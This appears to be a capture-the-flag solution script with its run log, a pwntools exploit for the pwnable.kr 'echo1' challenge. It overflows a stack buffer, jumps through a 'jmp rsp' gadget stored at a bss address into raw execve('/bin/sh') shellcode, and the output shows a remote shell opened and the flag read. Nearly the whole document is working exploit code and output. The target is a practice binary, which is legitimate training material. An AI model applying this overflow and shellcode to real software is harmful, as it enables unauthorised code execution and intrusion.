#@Windcarp 2015.07.23
from pwn import *
#init
context(arch = 'amd64', os = 'linux')
local=False
if local:
p = process("./echo1")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so")
else:
p = remote("pwnable.kr", 9010)
binary = ELF("echo1")
raw_input()
#address
len_to_ret = 0x28
ret_addr_str = p64(0x6020a0)
jmpesp_str = asm('jmp rsp')
#payload
buf = ""
buf += "\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6"
buf += "\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x56\x57\x48\x89\xe6\x0f\x05"
payload = 'a'*len_to_ret
payload += ret_addr_str
payload += buf
print repr(payload)
#first step
#attention to fit the program well
print repr(p.recvuntil(':'))
p.send(jmpesp_str + '\n')
print repr(p.recvuntil('>'))
p.send('1' + '\n')
print repr(p.recvuntil('\n'))
p.send(payload + '\n')
print repr(p.recvuntil('\n'))
#yeah!We got the shell!
p.interactive()
python exploit.py
[+] Opening connection to pwnable.kr on port 9010: Done
[*] '/home/windcarp/\xe6\xa1\x8c\xe9\x9d\xa2/pwn/Lesson 4 pwn.kr \xe6\x8f\x90\xe9\xab\x98/echo1/echo1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0 `\x00\x00\x00\x00\x00j;X\x99H\xbb/bin/sh\x00SH\x89\xe7h-c\x00\x00H\x89\xe6R\xe8\x08\x00\x00\x00/bin/sh\x00VWH\x89\xe6\x0f\x05'
"hey, what's your name? :"
' \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n>'
' hello \xff\xe4\n'
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0 `\n'
[*] Switching to interactive mode
goodbye \xff
$ ls
echo1
flag
log
super.pl
$ cat flag
H4d_som3_fun_w1th_ech0_ov3rfl0w
$
#奇怪的bss段id参数的使用